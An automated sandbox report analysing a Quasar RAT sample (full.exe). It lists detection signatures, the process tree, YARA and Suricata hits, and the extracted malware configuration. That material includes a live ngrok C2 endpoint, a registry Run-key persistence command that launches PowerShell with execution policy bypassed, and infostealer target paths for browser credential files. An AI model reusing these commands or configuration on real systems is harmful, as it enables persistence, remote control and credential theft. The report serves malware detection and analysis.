Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
full.exe

Overview

General Information

Sample name:full.exe
Analysis ID:1573924
MD5:b59ee68c7c3ee01e14a7516628368046
SHA1:7a0cc3f080d1c2143e770d1fd50dc7f20bef9f7a
SHA256:e32128f875d42818741d274d447aacf2cdc15cc78a2ce0a393d629c4c90c779d
Tags:exeuser-smica83
Infos:

Detection

Quasar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Quasar RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Found Tor onion address
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Powershell In Registry Run Keys
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara signature match

Classification

  • System is w10x64
  • full.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\full.exe" MD5: B59EE68C7C3EE01E14A7516628368046)
    • conhost.exe (PID: 3368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4680 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • powershell.exe (PID: 4452 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • InstallUtil.exe (PID: 5084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • InstallUtil.exe (PID: 6188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
      • InstallUtil.exe (PID: 4792 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • cmd.exe (PID: 5624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7028 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
          • PING.EXE (PID: 6244 cmdline: ping -n 10 localhost MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Quasar RAT, QuasarRATQuasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.
  • APT33
  • Dropping Elephant
  • Stone Panda
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat
{"Version": "1.4.1", "Host:Port": "1.tcp.sa.ngrok.io:20545;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "a888ff96-3c09-47a6-9d99-754a5cdfdb56", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "Y9VoNeyeM++0LGCoGVcPsDliF341s/s1wChlfQacyTiOU7Sx1m4MTha5uh8Ccuc7TiKr7LiIFRgQa/A7bEH9k/sECgcq5B03RgxIMP15eFvdR4IQ1Q/ntBSjrKP3QfPWH3l3LfYefczmBttpVcWbvUjZiKq+frzJPIe8w5Kue36hFCcj1IwamTKWqowDzPNjbMglCvMu9+FWGDrerY56UiHr/eB5U3cDEDrwD2FOzo1Mx2X69wO70wXrBKi1YX7tswNN+4AqxYZ3u6us6JtfA04F59ZX3gErC3kITccyVU0tYkT6NN9/h0Mo3rx+gCB9c/hWHaQ1y1rTx6hiLRrxJ1nyNgYKpiRO+yyhK01iQEqcnd6ZI+lAyli9ezzydxNEiY7nU0V1UX6Ihu+9NAf5PeYO13JiYlMi7MLZI/69Shd2B2+EV5t2HK5kkyHxrSm3UnSCN0odpcdWhQxuY2EDRqZzXM5yyFXvWkuCDXGUYGpx9lhaO8gUK07udqQzNyHkJgsEWD7tmOwRoDB4Lu77buDF0b9tZ7Ok5GAlRRMV7aDztLE7YjAAYhu/1HIno3lX9Wanf9FC0fCXwY0+BQumK50rMAF4WBy2x0KNzFR7D6C9w25dMqHnzemZ/U1IlpJuXOrr+mkzZst4rgjB6dipgMTWgHGMLYfluVzquIoPLAE=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOk8qraUkzEDweoNS22W8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTEyMTA1MzcwMVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkI9dpABHaWIr76Y/HzS4JxheFPuAUxoAdViPqSp1xX+tQyfVaqepzAtkDoOIVpTF4uspRzQEPGTSoy26rDha4jfbYD+2vmOlfAJli1OCZsqCH5z2of74NA59vhFV5v2UcE4eyqmE0KNSkBxsw7yR06G8tkWLf31ULmqd9CAxoCAGeUXBa63JeQaPm03z+tE6g10LEaQ3keTszqNsdlkt1QucpoSoo+Ufc5uG56EIiLTnarO8xI2l1ZcJLDJhUbGh426dUto/YUChrNLurBGiRDWfB6JGgQ3n3FcLU5ioKuR8QxsPjAgGJE8k1kPTbZ8dbw4KHN4wzMBPPJl+1Co1airF3GWjVCiwtouJ6nkasy+pzmBDaRCP4aX/v4qPRZmjSLZi/OpWQ1AlJt8vdMiumbFAoa8nHXhUIp5+SPGoT/Wp28iyvSul8B/Wbkb4SQOWCp1VaQoCQJ2fOMo+QoS50e+xijozAjobUh7KlAyph9Kq9wYB0OQyebULyhxijXNBubLM1qu9ytoEuMr1YVQX4DFZfKqjIQjTyhPHixsG/wwFYAxoqDYeEXeCIscAmwCzmEcqPTmCGZK3oNb1KtDj0ePA2KD7s8GIlFduTRaJ1j2/C1C0JC22dSwXtj8phpuYKDOerCCYQ6S9Le9Pd0tw2/UESg+VePfsAyNKJsc3Tc8CAwEAAaMyMDAwHQYDVR0OBBYEFDkTHq2063+4lvf6qLVux36heKXxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBABWdQoQSr8kEYry26cU1M5BLdtld/kO5OfN4L/DoM0Tj6nY+ty5/bJq+PlK0KhFykSb3sWa5PycTTaWzIlMeoPcf7Yti9ovnlHCf1EFYsBGFZuRU7YS1vHETdJK40ozlKJZetTXO/zAu4tsNrQ7WNxkaEpNIsrZc1kk6ymVnEfM3kIBhgZV9yFtsoNOdXqWm2JGsP4/8h6biBEWYQSh87q8hRIuYKU7A777gX7DqAJr9VQCiHKBvtPhudvlA3XMZNSsqukAz6RpRQQjAB47K2sawwQ6yyTJHGv9Ylegmt39TBujVzbeUUmCqrUghtkpi2oIpM+lcXxPo4cNjHonXyvICjv7jkFbDkGDvK/O1wyTqhkHD190kkNI5Lmb2wlYvFNeTpw+LCFfqmpt4yjUGNRmVNiYRlXDculHqGlxDV/FMCZUVM3qojyHFI7glvsF9mnP56sq9gxi4Ca2GrmEw/PXlVuHpUOj6sAeOELOrFjCxy2XTjft5UAAMGjX7SGOC+Yp+hWjn33/baeQWhUAfAHiAX4s6UDx4nUIWvfIOwLE3/qzwzd6opkY92iV+tUJIQ1ynw/k1/EBBR6dF9Wak7XwYDS3AKYvAfYIeNNjeJP68RRf9PL8MvfD62X83JCTzU765IYkXe83ht054sI+uxq1E7nncT+0BN9pyasjPI0SW"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
    00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
      00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
        00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
          00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_QuasarYara detected Quasar RATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_QuasarYara detected Quasar RATJoe Security
              8.2.InstallUtil.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                8.2.InstallUtil.exe.400000.0.unpackMAL_QuasarRAT_May19_1Detects QuasarRAT malwareFlorian Roth
                • 0x28ef4e:$x1: Quasar.Common.Messages
                • 0x29f277:$x1: Quasar.Common.Messages
                • 0x2ab812:$x4: Uninstalling... good bye :-(
                • 0x2ad007:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
                8.2.InstallUtil.exe.400000.0.unpackINDICATOR_SUSPICIOUS_GENInfoStealerDetects executables containing common artifcats observed in infostealersditekSHen
                • 0x2aadc4:$f1: FileZilla\recentservers.xml
                • 0x2aae04:$f2: FileZilla\sitemanager.xml
                • 0x2aae46:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions
                • 0x2ab092:$b1: Chrome\User Data\
                • 0x2ab0e8:$b1: Chrome\User Data\
                • 0x2ab3c0:$b2: Mozilla\Firefox\Profiles
                • 0x2ab4bc:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2fd440:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                • 0x2ab614:$b4: Opera Software\Opera Stable\Login Data
                • 0x2ab6ce:$b5: YandexBrowser\User Data\
                • 0x2ab73c:$b5: YandexBrowser\User Data\
                • 0x2ab410:$s4: logins.json
                • 0x2ab146:$a1: username_value
                • 0x2ab164:$a2: password_value
                • 0x2ab450:$a3: encryptedUsername
                • 0x2fd384:$a3: encryptedUsername
                • 0x2ab474:$a4: encryptedPassword
                • 0x2fd3a2:$a4: encryptedPassword
                • 0x2fd320:$a5: httpRealm
                8.2.InstallUtil.exe.400000.0.unpackMALWARE_Win_QuasarStealerDetects Quasar infostealerditekshen
                • 0x164f16:$s1: PGma.System.MouseKeyHook, Version=5.6.130.0, Culture=neutral, PublicKeyToken=null
                • 0x2ab8fc:$s3: Process already elevated.
                • 0x28ec4d:$s4: get_PotentiallyVulnerablePasswords
                • 0x278cce:$s5: GetKeyloggerLogsDirectory
                • 0x29e9d6:$s5: GetKeyloggerLogsDirectory
                • 0x28ec70:$s6: set_PotentiallyVulnerablePasswords
                • 0x2fea6e:$s7: BQuasar.Client.Extensions.RegistryKeyExtensions+<GetKeyValues>

                System Summary

                barindex
                Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe
                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)
                Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe
                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AdobePS1 /t REG_SZ /d "powershell -ExecutionPolicy Bypass -File \"C:\Users\user\AppData\Local\Temp\Adobe.ps1\"" /f, ProcessId: 4680, ProcessName: reg.exe
                Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: powershell -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\Adobe.ps1", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdobePS1\(Default)
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\full.exe", ParentImage: C:\Users\user\Desktop\full.exe, ParentProcessId: 5644, ParentProcessName: full.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\Adobe.ps1, ProcessId: 4452, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T18:03:39.644015+010020355951Domain Observed Used for C2 Detected18.231.236.5220545192.168.2.949709TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-12T18:03:39.644015+010020276191Domain Observed Used for C2 Detected18.231.236.5220545192.168.2.949709TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: C:\Users\user\AppData\Local\Temp\aVqnxsyILS0b.batAvira: detection malicious, Label: BAT/Delbat.C
                Source: 8.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "1.tcp.sa.ngrok.io:20545;", "SubDirectory": "SubDir", "InstallName": "Client.exe", "MutexName": "a888ff96-3c09-47a6-9d99-754a5cdfdb56", "StartupKey": "Quasar Client Startup", "Tag": "Office04", "LogDirectoryName": "Logs", "ServerSignature": "Y9VoNeyeM++0LGCoGVcPsDliF341s/s1wChlfQacyTiOU7Sx1m4MTha5uh8Ccuc7TiKr7LiIFRgQa/A7bEH9k/sECgcq5B03RgxIMP15eFvdR4IQ1Q/ntBSjrKP3QfPWH3l3LfYefczmBttpVcWbvUjZiKq+frzJPIe8w5Kue36hFCcj1IwamTKWqowDzPNjbMglCvMu9+FWGDrerY56UiHr/eB5U3cDEDrwD2FOzo1Mx2X69wO70wXrBKi1YX7tswNN+4AqxYZ3u6us6JtfA04F59ZX3gErC3kITccyVU0tYkT6NN9/h0Mo3rx+gCB9c/hWHaQ1y1rTx6hiLRrxJ1nyNgYKpiRO+yyhK01iQEqcnd6ZI+lAyli9ezzydxNEiY7nU0V1UX6Ihu+9NAf5PeYO13JiYlMi7MLZI/69Shd2B2+EV5t2HK5kkyHxrSm3UnSCN0odpcdWhQxuY2EDRqZzXM5yyFXvWkuCDXGUYGpx9lhaO8gUK07udqQzNyHkJgsEWD7tmOwRoDB4Lu77buDF0b9tZ7Ok5GAlRRMV7aDztLE7YjAAYhu/1HIno3lX9Wanf9FC0fCXwY0+BQumK50rMAF4WBy2x0KNzFR7D6C9w25dMqHnzemZ/U1IlpJuXOrr+mkzZst4rgjB6dipgMTWgHGMLYfluVzquIoPLAE=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAOk8qraUkzEDweoNS22W8zANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MTEyMTA1MzcwMVoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAkI9dpABHaWIr76Y/HzS4JxheFPuAUxoAdViPqSp1xX+tQyfVaqepzAtkDoOIVpTF4uspRzQEPGTSoy26rDha4jfbYD+2vmOlfAJli1OCZsqCH5z2of74NA59vhFV5v2UcE4eyqmE0KNSkBxsw7yR06G8tkWLf31ULmqd9CAxoCAGeUXBa63JeQaPm03z+tE6g10LEaQ3keTszqNsdlkt1QucpoSoo+Ufc5uG56EIiLTnarO8xI2l1ZcJLDJhUbGh426dUto/YUChrNLurBGiRDWfB6JGgQ3n3FcLU5ioKuR8QxsPjAgGJE8k1kPTbZ8dbw4KHN4wzMBPPJl+1Co1airF3GWjVCiwtouJ6nkasy+pzmBDaRCP4aX/v4qPRZmjSLZi/OpWQ1AlJt8vdMiumbFAoa8nHXhUIp5+SPGoT/Wp28iyvSul8B/Wbkb4SQOWCp1VaQoCQJ2fOMo+QoS50e+xijozAjobUh7KlAyph9Kq9wYB0OQyebULyhxijXNBubLM1qu9ytoEuMr1YVQX4DFZfKqjIQjTyhPHixsG/wwFYAxoqDYeEXeCIscAmwCzmEcqPTmCGZK3oNb1KtDj0ePA2KD7s8GIlFduTRaJ1j2/C1C0JC22dSwXtj8phpuYKDOerCCYQ6S9Le9Pd0tw2/UESg+VePfsAyNKJsc3Tc8CAwEAAaMyMDAwHQYDVR0OBBYEFDkTHq2063+4lvf6qLVux36heKXxMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBABWdQoQSr8kEYry26cU1M5BLdtld/kO5OfN4L/DoM0Tj6nY+ty5/bJq+PlK0KhFykSb3sWa5PycTTaWzIlMeoPcf7Yti9ovnlHCf1EFYsBGFZuRU7YS1vHETdJK40ozlKJZetTXO/zAu4tsNrQ7WNxkaEpNIsrZc1kk6ymVnEfM3kIBhgZV9yFtsoNOdXqWm2JGsP4/8h6biBEWYQSh87q8hRIuYKU7A777gX7DqAJr9VQCiHKBvtPhudvlA3XMZNSsqukAz6RpRQQjAB47K2sawwQ6yyTJHGv9Ylegmt39TBujVzbeUUmCqrUghtkpi2oIpM+lcXxPo4cNjHonXyvICjv7jkFbDkGDvK/O1wyTqhkHD190kkNI5Lmb2wlYvFNeTpw+LCFfqmpt4yjUGNRmVNiYRlXDculHqGlxDV/FMCZUVM3qojyHFI7glvsF9mnP56sq9gxi4Ca2GrmEw/PXlVuHpUOj6sAeOELOrFjCxy2XTjft5UAAMGjX7SGOC+Yp+hWjn33/baeQWhUAfAHiAX4s6UDx4nUIWvfIOwLE3/qzwzd6opkY92iV+tUJIQ1ynw/k1/EBBR6dF9Wak7XwYDS3AKYvAfYIeNNjeJP68RRf9PL8MvfD62X83JCTzU765IYkXe83ht054sI+uxq1E7nncT+0BN9pyasjPI0SW"}
                Source: Yara matchFile source: 8.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000003036000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1736823660.0000020C23375000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1946047934.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1913763802.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4452, type: MEMORYSTR
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                Source: unknownHTTPS traffic detected: 108.181.61.49:443 -> 192.168.2.9:49711 version: TLS 1.2
                Source: full.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2027619 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (Quasar CnC) : 18.231.236.52:20545 -> 192.168.2.9:49709
                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 18.231.236.52:20545 -> 192.168.2.9:49709
                Source: Malware configuration extractorURLs: 1.tcp.sa.ngrok.io
                Source: full.exe, 00000000.00000000.1450416851.00000000006D6000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: m=nil base netdnsdomaingophertelnetreturn.locallisten.onionip+netsocketSundayMondayFridayAugustUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13minutesecondsecretuint16uint32uint64structchan<-<-chan Valuehangupkilledexec: %s[%dm%s[%smGolang115_PQ120_PQSafari15.6.1%w: %scurvesspdy/3spdy/2 bytesServerpsk_kex25519GC256AGC256BGC256CGC256DGC512AGC512BGC512CpromptsurveyfrenchSTREETcmd/goavx512rdrandrdseedno '/'headerAnswerLengthWeightTargetGetAcesendtoprintf'"&<>\u%04Xyellowblue+hcyan+hao1990aranesasanteauvernbcizblcisaupcreissdajnkoekavskfonipafonupagascongritalheplocndyukanicardpamakapinyinscousesimpletaraskucrcorulsterunifondefinewarningtls3desderivedInitialnumber booleanbdoUxXvintegercomplexfloat32float64readdirwriteatconsolepav.exeAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUpgradeTrailerHEADERSCreatedIM UsedRefererreferer flags= len=%d (conn) 